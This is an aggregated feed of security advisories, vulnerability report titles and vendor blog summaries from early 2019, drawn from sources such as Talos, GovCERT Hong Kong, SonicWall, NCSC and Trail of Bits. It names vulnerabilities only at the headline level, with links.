2019-04-15T04:00:00Z | 1555300800

Apache Software Foundation has released new versions of Apache Tomcat 7, 8 and 9 to address a vulnerability in CGI servlet.

https://www.govcert.gov.hk/en/alerts_detail.php
Shimo VPN helper tool writeConfig privilege escalation vulnerability
2019-04-15T00:00:00Z | 1555286400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0675
Shimo VPN helper tool code-signing privilege escalation vulnerability
2019-04-15T00:00:00Z | 1555286400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0678
Shimo VPN helper tool RunVpncScript privilege escalation vulnerability
2019-04-15T00:00:00Z | 1555286400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0677
Shimo VPN Helper Tool disconnectService denial-of-service vulnerability
2019-04-15T00:00:00Z | 1555286400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0673
Shimo VPN helper tool deleteConfig denial-of-service vulnerability
2019-04-15T00:00:00Z | 1555286400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0676
Shimo VPN helper tool configureRoutingWithCommand privilege escalation vulnerability
2019-04-15T00:00:00Z | 1555286400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0674
VMware Workstation 15 vertex shader functionality denial-of-service vulnerability
2019-04-15T00:00:00Z | 1555286400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0762
Multiple VPN applications insecurely store session cookies
2019-04-12T20:17:47Z | 1555100267

A research of Software Engineering Institute of the Carnegie Mellon University shows that multiple VPN applications store the authentication and/or session cookies insecurely in memory and/or log files. CVE: CVE-2019-1573 CVE-2016-8201 Last updated: April 12, 2019, 8:17 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0005
SonicWall Global Management System (GMS) Deprecated SSH keys Vulnerability
2019-04-11T11:00:00Z | 1554980400

A vulnerability in SonicWall Global Management System (GMS), allow a remote user to gain access to the appliance using existing SSH key. This vulnerability affects GMS versions 9.1, 9.0, 8.7, 8.6, 8.4, 8.3 and earlier. CVE: CVE-2019-7476 Last updated: April 26, 2019, 11 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0004
The Cloud-Native Network: What It Means and Why It Matters
2019-04-11T10:18:35Z | 1554977915

It’s no secret that CIOs want their networks to be more agile, better able to accommodate new requirements of the digital business. SD-WAN has made significant advancements in that regard. And, yet, it’s also equally clear that SD-WAN alone cannot futureproof enterprise networks. Mobile users, cloud resources, security services — all are critical to the... The post The Cloud-Native Network: What It Means and Why It Matters appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-cloud-native-network-what-it-means-and-why-it-matters/
High Threat Security Alert (A19-04-02): Multiple Vulnerabilities in Microsoft Products (April 2019)
2019-04-10T04:00:00Z | 1554868800

Microsoft has released security updates addressing multiple vulnerabilities and which affect several Microsoft products or components. Reports indicate active exploitation against the vulnerabilities in Microsoft Windows have been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-04-03): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2019-04-10T04:00:00Z | 1554868800

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Announcing QueryCon 2019
2019-04-09T11:50:47Z | 1554810647

Exciting news: We’re hosting the second annual QueryCon on June 20th-21st in New York City, co-sponsored by Kolide and Carbon Black! Register here QueryCon has become the foremost event for the osquery and osql open-source community. QueryCon brings together core maintainers, developers, and end-users to teach, discuss, and collaborate on Facebook’s award-winning open-source endpoint detection […]

https://blog.trailofbits.com/2019/04/09/announcing-querycon-2019/
Standard Insurance Transforms WAN with Cato Cloud to Win ICMG Award For Best IT Infrastructure Architecture
2019-04-09T10:10:17Z | 1554804617

It’s always great to see a winning customer implementation;  it’s even better when others see it too. We just announced that a customer of ours, Standard Insurance Co.,  has won an ICMG Architecture Excellence Awards for its digital transformation initiative. Kudos to the entire Standard Insurance IT team. “The cost of the total solution Cato... The post Standard Insurance Transforms WAN with Cato Cloud to Win ICMG Award For Best IT Infrastructure Architecture appeared first on Cato Networks.

https://www.catonetworks.com/blog/standard-insurance-transforms-wan-with-cato-cloud-to-win-icmg-award-for-best-it-infrastructure-architecture/
Adobe Acrobat Reader DC text field value remote code execution vulnerability — redux
2019-04-09T00:00:00Z | 1554768000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0774
User-Friendly Fuzzing with Sienna Locomotive
2019-04-08T11:50:13Z | 1554724213

Fuzzing is a great way to find bugs in software, but many developers don’t use it. We hope to change that today with the release of Sienna Locomotive, a new open-source fuzzer for Windows that emphasizes usability. Sienna Locomotive aims to make fuzzing accessible to developers with limited security expertise. Its user-oriented features make it […]

https://blog.trailofbits.com/2019/04/08/user-friendly-fuzzing-with-sienna-locomotive/
The Leaders of the Future: Tech for Growing Minds
2019-04-08T04:00:00Z | 1554696000

Jobs in the STEM and Tech fields are growing at "three times the pace of non-STEM jobs." The rise of technological advances means the tech industry is not slowing down anytime soon. In the next decade, there will be 1...

https://www.akamai.com/blog/culture/the-leaders-of-the-future-tech-for-growing-minds
Capsule Technologies SmartLinx Neuron 2 restricted environment protection mechanism failure vulnerability
2019-04-08T00:00:00Z | 1554681600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0785
Russian state-sponsored cyber actors targeting network infrastructure devices
2019-04-05T08:49:22Z | 1554454162

This advisory provides information on the worldwide cyber exploitation of network infrastructure devices (e.g. routers, switches, firewalls, Network-based Intrusion Detection System (NIDS) devices) by Russian state-sponsored cyber actors.

https://www.ncsc.gov.uk/news/russian-state-sponsored-cyber-actors-targeting-network-infrastructure-devices
High Threat Security Alert (A19-04-01): Multiple Vulnerabilities in Apache HTTP Server
2019-04-03T04:00:00Z | 1554264000

The Apache Software Foundation released a security update to address multiple vulnerabilities in the modules of HTTP Server.

https://www.govcert.gov.hk/en/alerts_detail.php
How To Best Design Your WAN for Accessing AWS, Azure, and the Cloud
2019-04-02T11:13:16Z | 1554203596

In 2014, Gartner analysts wrote a Foundational Report (G00260732, Communication Hubs Improve WAN Performance) providing guidance to customers on deploying communication hubs, or cloud-based network hubs, outside the enterprise data center. Five years later, that recommendation is more important than ever, as current enterprise computing strategies dictate the need for a modern WAN architecture. What... The post How To Best Design Your WAN for Accessing AWS, Azure, and the Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-cato-cloud-is-the-ultimate-network-of-communication-hubs/
SonicOS & SonicOSv CBC Cipher TLS Padding Vulnerability
2019-04-01T20:00:00Z | 1554148800

A vulnerability in SonicOS and SonicOSv TLS CBC Cipher allow remote attackers to obtain sensitive plaintext data when CBC cipher suites are enabled. This vulnerability affected SonicOS Gen 5 version 5.9.1.10 and earlier, Gen 6 version 6.2.7.3, 6.5.1.3, 6.5.2.2, 6.5.3.1, 6.2.7.8, 6.4.0.0, 6.5.1.8, 6.0.5.3-86o and SonicOSv 6.5.0.2-8v_RC363 (VMWARE), 6.5.0.2.8v_RC367 (AZURE), SonicOSv 6.5.0.2.8v_RC368 (AWS), SonicOSv 6.5.0.2.8v_RC366 (HYPER_V). CVE: CVE-2019-7477 Last updated: April 1, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0003
SonicOS Unprivileged User Access ARS
2019-04-01T20:00:00Z | 1554148800

A vulnerability in SonicOS with management enabled system on specific configuration allow unprivileged user to access advanced routing services. This vulnerability affected SonicOS Gen 5 version 5.9.1.10 and earlier, Gen 6 version 6.2.7.3, 6.5.1.3, 6.5.2.2, 6.5.3.1, 6.2.7.8, 6.4.0.0, 6.5.1.8, 6.0.5.3-86o and SonicOSv 6.5.0.2-8v_RC363 (VMWARE), 6.5.0.2.8v_RC367 (AZURE), SonicOSv 6.5.0.2.8v_RC368 (AWS), SonicOSv 6.5.0.2.8v_RC366 (HYPER_V). CVE: CVE-2019-7475 Last updated: April 1, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0002
Performing Concolic Execution on Cryptographic Primitives
2019-04-01T11:50:55Z | 1554119455

For my winternship and springternship at Trail of Bits, I researched novel techniques for symbolic execution on cryptographic protocols. I analyzed various implementation-level bugs in cryptographic libraries, and built a prototype Manticore-based concolic unit testing tool, Sandshrew, that analyzed C cryptographic primitives under a symbolic and concrete environment. Sandshrew is a first step […]

https://blog.trailofbits.com/2019/04/01/performing-concolic-execution-on-cryptographic-primitives/
2018. aastal teatati küberjuhtumitest kaks korda enam
2019-04-01T10:16:06Z | 1554113766

Riigi Infosüsteemi Ametile (RIA) teatati mullu kordades rohkem küberjuhtumitest kui varasematel aastatel. Suurima varalise kahju tõid arvepettused.

https://ria.ee/uudised/2018-aastal-teatati-kuberjuhtumitest-kaks-korda-enam
SonicOS Download Certificate in Admin GUI Could Cause System Instability
2019-04-01T00:00:00Z | 1554076800

A vulnerability in SonicOS allow authenticated read-only admin to leave the firewall in an unstable state by downloading certificate with specific extension. This vulnerability affected SonicOS Gen 5 version 5.9.1.10 and earlier, Gen 6 version 6.2.7.3, 6.5.1.3, 6.5.2.2, 6.5.3.1, 6.2.7.8, 6.4.0.0, 6.5.1.8, 6.0.5.3-86o and SonicOSv 6.5.0.2-8v_RC363 (VMWARE), 6.5.0.2.8v_RC367 (AZURE), SonicOSv 6.5.0.2.8v_RC368 (AWS), SonicOSv 6.5.0.2.8v_RC366 (HYPER_V). CVE: CVE-2019-7474 Last updated: April 1, 2019, midnight

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0001
PPA: Eesti uus ID-kaart sai kõrge tunnustuse
2019-03-29T12:29:13Z | 1553862553

2018. aastal lõpust välja antav uus Eesti ID-kaart pälvis sel nädalal kõrge tunnustuse, kui avaldati turvalisuse ja disainiga maailmas enim silma paistnud dokumendid ja sularaha kupüürid.

https://ria.ee/uudised/ppa-eesti-uus-id-kaart-sai-korge-tunnustuse
Security Alert (A19-03-08): Multiple Vulnerabilities in VMware Products
2019-03-29T04:00:00Z | 1553832000

VMware has published a security advisory to address multiple vulnerabilities in virtual USB 1.1 UHCI (Universal Host Controller Interface), virtual network adapters and VMware Tools.

https://www.govcert.gov.hk/en/alerts_detail.php
The AWS Cloud Security Issues You Don?t Want to Ignore
2019-03-28T12:55:00Z | 1553777700

AWS is the biggest name in IaaS, but the shared responsibility model leaves you open to risk. A full approach to AWS cloud security can fill the gap.

https://www.akamai.com/blog/security/aws-cloud-security-concerns
Fuzzing In The Year 2000
2019-03-28T11:50:56Z | 1553773856

It is time for the second installment of our efforts to reproduce original fuzzing research on modern systems. If you haven’t yet, please read the first part. This time we tackle fuzzing on Windows by reproducing the results of “An Empirical Study of the Robustness of Windows NT Applications Using Random Testing” (aka ‘the NT […]

https://blog.trailofbits.com/2019/03/28/fuzzing-in-the-year-2000/
Security Alert (A19-03-07): Multiple Vulnerabilities in Cisco Products (March 2019)
2019-03-28T04:00:00Z | 1553745600

Cisco released security advisories to address multiple vulnerabilities in Cisco IOS and IOS XE software.

https://www.govcert.gov.hk/en/alerts_detail.php
Reducing WAN Spend when Adopting UCaaS
2019-03-27T14:38:22Z | 1553697502

Unified Communications-as-a-Service (UCaaS) is increasingly attractive to organizations looking to eliminate the cost of operating on-premises platforms and PSTN access contracts. However, those looking to adopt UCaaS to save money may be in for a nasty surprise. UCaaS offerings move unified communications capabilities — integrated calling, conferencing, and messaging applications — normally delivered from on-premises... The post Reducing WAN Spend when Adopting UCaaS appeared first on Cato Networks.

https://www.catonetworks.com/blog/reducing-wan-spend-when-adopting-ucaas/
CERT-UK Annual Report 2015/16
2019-03-26T14:28:54Z | 1553610534

https://www.ncsc.gov.uk/report/cert-uk-annual-report-201516
Introducing Guardicore Cyber Threat Intelligence
2019-03-26T13:00:00Z | 1553605200

Introducing Cyber Threat Intelligence (CTI), a freely available resource to assist in identifying and investigating malicious IP addresses and domains.

https://www.akamai.com/blog/security/introducing-guardicore-cyber-threat-intelligence
Estonian and Finnish information security authorities joined forces in FINEST19 exercise
2019-03-26T07:58:40Z | 1553587120

The Finnish Transport and Communications Agency Traficom's National Cyber Security Centre (NCSC-FI) and the Estonian Information System Authority CERT-EE held a joint critical infrastructure incident management exercise called FINEST2019 on 25 March 2019.

https://www.kyberturvallisuuskeskus.fi/en/news/estonian-and-finnish-information-security-authorities-joined-forces-finest19-exercise
Security Alert (A19-03-06): Multiple Vulnerabilities in Apple iOS
2019-03-26T04:00:00Z | 1553572800

Apple has released a security update in its latest iOS version 12.2 to fix 50 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
GOG Galaxy Games changeFolderPermissionsAtPath privilege escalation vulnerability
2019-03-26T00:00:00Z | 1553558400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0724
GOG Galaxy Games fillProcessInformationForPids information leak vulnerability
2019-03-26T00:00:00Z | 1553558400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0726
GOG Galaxy service insecure file permissions local privilege elevation vulnerability
2019-03-26T00:00:00Z | 1553558400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0640
GOG Galaxy Games privileged helper denial-of-service vulnerability
2019-03-26T00:00:00Z | 1553558400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0727
GOG Galaxy Games directory insecure file permissions local privilege elevation vulnerability
2019-03-26T00:00:00Z | 1553558400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0723
GOG Galaxy updater temp directory insecure file permissions local privilege elevation vulnerability
2019-03-26T00:00:00Z | 1553558400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0722
Nouveau Display Driver Remote Denial of Service
2019-03-26T00:00:00Z | 1553558400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0647
GOG Galaxy Games createFolderAtPath privilege escalation vulnerability
2019-03-26T00:00:00Z | 1553558400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0725
Guardicore Threat Intelligence Helps Cybersecurity Community Research Attacks and Mitigate Risks
2019-03-25T15:48:00Z | 1553528880

This post discusses how Guardicore Labs helps Guardicore customers and the security community enhance their security posture.

https://www.akamai.com/blog/security/guardicore-threat-intelligence-helps-cybersecurity-community-res
What Application Developers Need To Know About TLS Early Data (0RTT)
2019-03-25T13:00:23Z | 1553518823

TLS 1.3 represents the culmination of over two decades of experience in deploying large-scale transport security. For the most part it simplifies and improves the security of TLS and can act as a drop-in replacement for TLS 1.2. However, one new feature in the protocol represents a significant security risk to some existing applications: TLS […]

https://blog.trailofbits.com/2019/03/25/what-application-developers-need-to-know-about-tls-early-data-0rtt/
Security Alert (A19-03-05): Multiple Vulnerabilities in Firefox
2019-03-25T04:00:00Z | 1553486400

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Introducing Ability Purge Cache Tag
2019-03-24T04:00:00Z | 1553400000

The new purge by cache tag functionality in Akamai?s Fast Purge is now available to all Akamai content delivery product customers. To get to this point, we went through an exciting, year-long beta with more than 200 participants purging ~200,000,000 tags. During this time, we noted some fascinating (and surprising) ways that customers leveraged tags in their caching strategy -- we?ll share our six favorite here.

https://www.akamai.com/blog/developers/introducing-ability-purge-cache-tag
MKM: RIA peadirektoriks saab Margus Noormaa
2019-03-22T09:15:10Z | 1553246110

Ettevõtlus- ja infotehnoloogiaminister Rene Tammist nimetas täna Riigi Infosüsteemi Ameti (RIA) uueks peadirektoriks Margus Noormaa.

https://ria.ee/uudised/mkm-ria-peadirektoriks-saab-margus-noormaa
SD-Wan Consideration Factors for Global Companies
2019-03-21T12:06:01Z | 1553169961

For global companies still operating with a legacy WAN architecture, WAN modernization is mandatory today for a variety of reasons. For example, digital transformation is based on business speed, and the lack of network agility can hold an organization back. A company that has to wait months to install networking equipment in order to open... The post SD-Wan Consideration Factors for Global Companies appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-consideration-factors-for-global-companies/
5 Docker Security Best Practices to Avoid Breaches
2019-03-20T18:42:00Z | 1553107320

Like with any technology, Docker too has its security concerns. Learn the Docker security best practices that will help keep your infrastructure and applications secure.

https://www.akamai.com/blog/security/docker-security-best-practices
Security Alert (A19-03-04): Multiple Vulnerabilities in Firefox
2019-03-20T04:00:00Z | 1553054400

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
CUJO Smart Firewall safe browsing Host header-parsing firewall bypass vulnerability
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0702
CUJO Smart Firewall static DHCP hostname command injection vulnerability
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0627
CUJO Smart Firewall mdnscap mDNS character-strings code execution vulnerability
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0672
CUJO Smart Firewall threatd hostname reputation check code execution vulnerability
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0703
CUJO Smart Firewall mdnscap mDNS record parsing code execution vulnerability
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0653
Das U-Boot verified boot bypass
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0633
CUJO Smart Firewall dhcpd.conf verified boot bypass
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0634
CUJO Smart Firewall mdnscap mDNS label compression denial-of-service vulnerability
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0671
CUJO Smart Firewall mdnscap mDNS SRV record denial-of-service vulnerability
2019-03-19T00:00:00Z | 1552953600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0681
Akamai in the Community: Making Tech Accessible
2019-03-18T04:00:00Z | 1552881600

Here at Akamai, we believe every person is important, and that no one should be left out. Our internal culture is cultivated by looking outwards, into the community, to make the life of our society better. Not only do we...

https://www.akamai.com/blog/culture/akamai-in-the-community-making-tech-accessible
Good network performance and development of IoT security brought fair cyber weather for February
2019-03-14T14:21:46Z | 1552573306

Despite glimpses of sun, the cyber weather in February was chilly and rainy. Scammers tried to access usernames and passwords, as well as distribute malware via email. No data breaches were detected in Finland in February but regular vulnerabilities keep exposing organisations’ networks to criminals.

https://www.kyberturvallisuuskeskus.fi/en/news/good-network-performance-and-development-iot-security-brought-fair-cyber-weather-february
Good network performance and development of IoT security brought fair cyber weather for February
2019-03-14T14:21:46Z | 1552573306

Despite glimpses of sun, the cyber weather in February was chilly and rainy. Scammers tried to access usernames and passwords, as well as distribute malware via email. No data breaches were detected in Finland in February but regular vulnerabilities keep exposing organisations’ networks to criminals.

https://www.kyberturvallisuuskeskus.fi/en/news/good-network-performance-and-development-iot-security-brought-fair-cyber-weather-february
Krüptograafia uuring aitab kaasa turvalisemate lahenduste leidmisele
2019-03-13T11:24:08Z | 1552476248

Riigi Infosüsteemi Ameti (RIA) tellitud uuring kirjeldab postkvant-krüptograafia hetkeseisusu ning annab ülevaate kvantarvutitest ning nende võimalikust ohust krüptograafiale.

https://ria.ee/uudised/kruptograafia-uuring-aitab-kaasa-turvalisemate-lahenduste-leidmisele
High Threat Security Alert (A19-03-03): Multiple Vulnerabilities in Microsoft Products (March 2019)
2019-03-13T04:00:00Z | 1552449600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
CleanMyMac X incomplete update patch privilege escalation vulnerability
2019-03-11T00:00:00Z | 1552262400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0759
WAGO e!Cockpit authentication hard-coded encryption key vulnerability
2019-03-09T00:00:00Z | 1552089600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0898
WAGO PFC200 iocheckd service "I/O-Check" cache DNS code execution vulnerability
2019-03-09T00:00:00Z | 1552089600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0961
WAGO e!COCKPIT Firmware Downgrade Vulnerability
2019-03-09T00:00:00Z | 1552089600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0951
The Voice of Tech: Who We Are, What We Want to Say
2019-03-08T05:00:00Z | 1552021200

Have you ever wondered what it might be like to see inside one of the biggest tech companies in the world? Well, we're starting a new series of blogs to give you the insight you've never had before. Akamai's innovations...

https://www.akamai.com/blog/culture/the-voice-of-tech-who-we-are-what-we-want-to-say
Avoiding Security Misconfiguration
2019-03-07T14:14:00Z | 1551968040

Security Misconfiguration exposes networks to risk on premises and the cloud. What do you need to know to limit firewall security misconfiguration?

https://www.akamai.com/blog/security/understanding-and-avoiding-security-misconfiguration
What is OTT SD-WAN?
2019-03-07T10:14:44Z | 1551953684

Companies evaluating which SD-WAN approach is best for them will have to decide between deploying an Over the Top (OTT) SD-WAN or having their SD-WAN bundled with the underlying network. The decision certainly has a big impact on SD-WAN’s complexity, performance, and affordability. The benefits of OTT SD-WAN OTT SD-WAN is any SD-WAN that operates... The post What is OTT SD-WAN? appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-ott-sd-wan/
High Threat Security Alert (A19-03-02): Vulnerability in Google Chrome
2019-03-07T04:00:00Z | 1551931200

Google released a security update to address a use-after-free vulnerability in the FileReader application programming interface (API) of the Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Pixar Renderman Install Helper Privilege Escalation Vulnerability
2019-03-07T00:00:00Z | 1551916800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0773
Global Traffic Management for Cloud, Data Centers, and CDNs
2019-03-06T05:00:00Z | 1551848400

Twenty years ago it would be common to have multiple data centers load balanced with specialized devices. The applications in multiple data centers would use the Domain Name System (DNS) to look up the application destination. The DNS system would be set up to with multiple data center locations. This would "round robin" the results between the data centers. If you have four data centers, the customers would get "round-robined" between each data center.

https://www.akamai.com/blog/security/global-traffic-management-for-cloud-data-centers-and-cdns
FIRST releases DDoS mitigation training course
2019-03-05T18:00:00Z | 1551808800

The Forum of Incident Response and Security Teams (FIRST), which brings together incident responders from around the world, invested in the creation of a new training course “DDoS Mitigation Fundamentals”. Authored by Krassimir T. Tzvetanov, a recognized expert in the field, the training teaches incident responders to handle attacks and securing their organisations.

https://www.first.org/newsroom/releases/20190305
High Threat Security Alert (A19-03-01): Vulnerability in Adobe ColdFusion
2019-03-04T04:00:00Z | 1551672000

Adobe released a security update to address a “File Upload Restriction Bypass” vulnerability in ColdFusion.

https://www.govcert.gov.hk/en/alerts_detail.php
Antenna House Rainbow PDF Office server document converter getSummaryInformation NumProperties code execution vulnerability
2019-02-28T00:00:00Z | 1551312000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0780
Cato MDR and Zero-Day Threat Prevention: Meet Our Two Newest Security Offerings
2019-02-26T13:30:00Z | 1551187800

Today we announced two significant additions to Cato Security Services. Cato Managed Threat Detection and Response (MDR) offloads the resource-intensive and skill-dependent process of detecting compromised endpoints onto Cato. A new partnership with SentinelOne, the leading provider of autonomous endpoint protection solutions, brings zero-day threat prevention to Cato’s cloud-based network protection. Together with the rest... The post Cato MDR and Zero-Day Threat Prevention: Meet Our Two Newest Security Offerings appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-mdr-and-zero-day-threat-prevention-meet-our-two-newest-security-offerings/
Security Alert (A19-02-08): Multiple Vulnerabilities in ISC BIND
2019-02-25T04:00:00Z | 1551067200

Multiple vulnerabilities were found in "EDNS", "managed-keys" and "Dynamically Loadable Zones" features of the ISC BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-02-07): Vulnerability in Adobe Reader/Acrobat
2019-02-22T04:00:00Z | 1550808000

A security update is released for Adobe Reader and Acrobat to address a vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
Optimizing UCaaS Access with SD-WAN Services
2019-02-21T15:02:46Z | 1550761366

One of the key requirements of Unified Communications-as-a-Service (UCaaS) is the ability to connect to service providers via the Internet.  As I discussed in my previous blog, few companies, especially global organizations, have Internet access at every branch. UCaaS traffic must be backhauled across the WAN to Internet access point resulting in inefficient traffic routing... The post Optimizing UCaaS Access with SD-WAN Services appeared first on Cato Networks.

https://www.catonetworks.com/blog/optimizing-ucaas-access-with-sd-wan-services/
High Threat Security Alert (A19-02-06): Vulnerability in Drupal
2019-02-21T04:00:00Z | 1550721600

Drupal released security updates to fix the vulnerability resided in the Drupal Core and its modules. Report indicates that active exploitation against the vulnerability has been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
Phishing campaign
2019-02-20T09:54:20Z | 1550656460

The NCSC is investigating a large-scale phishing campaign affecting sectors including transport, engineering and defence.

https://www.ncsc.gov.uk/news/phishing-campaign
McAfee GetSusp VersionInfo Parsing Denial of Service Vulnerability
2019-02-20T00:00:00Z | 1550620800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0509
Muutus eesti.ee postkasti teavitus
2019-02-19T06:24:17Z | 1550557457

Sellest nädalast saab riigiportaali kaudu tulnud asutuste teavitusi lugeda nii isiklikust postkastist kui ka portaali postkastist. Seni saatsid asutused teavitusi ja dokumente vaid isiklikule meiliaadressile ning portaali postkasti selle kohta eraldi märget ei jäänud.

https://ria.ee/uudised/muutus-eestiee-postkasti-teavitus
Administrators without full permissions can download imported certificates
2019-02-15T20:00:00Z | 1550260800

In SonicWall SonicOS, administrators without full permissions can download imported certificates. Occurs when administrators who are not in the SonicWall Administrators user group attempt to download imported certificates. This vulnerability affected SonicOS Gen 5 version 5.9.1.10 and earlier, Gen 6 version 6.2.7.3, 6.5.1.3, 6.5.2.2, 6.5.3.1, 6.2.7.8, 6.4.0.0, 6.5.1.8, 6.0.5.3-86o and SonicOSv 6.5.0.2-8v_RC363 (VMWARE), 6.5.0.2.8v_RC367 (AZURE), SonicOSv 6.5.0.2.8v_RC368 (AWS), SonicOSv 6.5.0.2.8v_RC366 (HYPER_V). CVE: CVE-2018-9867 Last updated: April 1, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0017
Steady rain in January cyber weather
2019-02-15T11:56:55Z | 1550231815

Cyber weather has a new design inspired by the new Transport and Communications Agency. Now cyber weather also includes longer-term top five threats and monthly conclusions with highlights that deserve praise and issues that need further development.

https://www.kyberturvallisuuskeskus.fi/en/news/steady-rain-january-cyber-weather
Steady rain in January cyber weather
2019-02-15T11:56:55Z | 1550231815

Cyber weather has a new design inspired by the new Transport and Communications Agency. Now cyber weather also includes longer-term top five threats and monthly conclusions with highlights that deserve praise and issues that need further development.

https://www.kyberturvallisuuskeskus.fi/en/news/steady-rain-january-cyber-weather
E-Eesti nõukogu toetas ID-kaardi ja e-identiteedi 10 aasta arenguplaani
2019-02-15T09:21:34Z | 1550222494

Stenbocki maja, 15. veebruar 2019 – E-Eesti nõukogu kiitis täna heaks Politsei- ja Piirivalveameti (PPA) ning Riigi Infosüsteemi Ameti (RIA) eestvedamisel valminud identiteedi- ja dokumendihalduse valge raamatu, mis kaardistab valdkonna hetkeolukorra ja toob välja ekspertide esmased vaated järgneva 10 aasta arengute kohta.

https://ria.ee/uudised/e-eesti-noukogu-toetas-id-kaardi-ja-e-identiteedi-10-aasta-arenguplaani
Security Alert (A19-02-05): Vulnerability in Linux Operating Systems
2019-02-14T04:00:00Z | 1550116800

A vulnerability was found in the software deployment and package management system called snapd which is used by several Linux distributions.

https://www.govcert.gov.hk/en/alerts_detail.php
AutoDesk AutoCAD 2019 cell margin code execution vulnerability
2019-02-14T00:00:00Z | 1550102400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0680
AutoDesk AutoCAD 2019 LinetypeTableRecord Code Execution Vulnerability
2019-02-14T00:00:00Z | 1550102400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0682
AutoDesk AutoCAD 2019 DXF-parsing code execution vulnerability
2019-02-14T00:00:00Z | 1550102400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0670
Preparing for denial of service (DoS) attacks
2019-02-13T12:39:49Z | 1550061589

It is not possible to fully mitigate the risk of a denial of service attack affecting your service, but there are some practical steps that will help you be prepared to respond, in the event your service is subjected to an attack.

https://www.ncsc.gov.uk/guidance/preparing-denial-service-dos-attacks
4 Ways Cato is Perfect for UCaaS
2019-02-13T11:19:49Z | 1550056789

Cato announced today that it’s been certified as a connectivity partner of RingCentral, a leading provider of enterprise cloud communications, collaboration and contact center solutions. During certification testing, RingCentral found Cato could deliver high-quality voice even across lines with 15 percent packet loss. You can hear for yourself what that sounds like on this brief... The post 4 Ways Cato is Perfect for UCaaS appeared first on Cato Networks.

https://www.catonetworks.com/blog/4-ways-cato-is-perfect-for-ucaas/
High Threat Security Alert (A19-02-02): Multiple Vulnerabilities in Microsoft Products (February 2019)
2019-02-13T04:00:00Z | 1550030400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate active exploitation against the vulnerability in Microsoft Internet Explorer has been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-02-03): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2019-02-13T04:00:00Z | 1550030400

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-02-04): Multiple Vulnerabilities in Firefox
2019-02-13T04:00:00Z | 1550030400

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader DC text field "comb" property remote code execution vulnerability
2019-02-12T00:00:00Z | 1549929600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0714
High Threat Security Alert (A19-02-01): Multiple Vulnerabilities in Apple iOS
2019-02-08T04:00:00Z | 1549598400

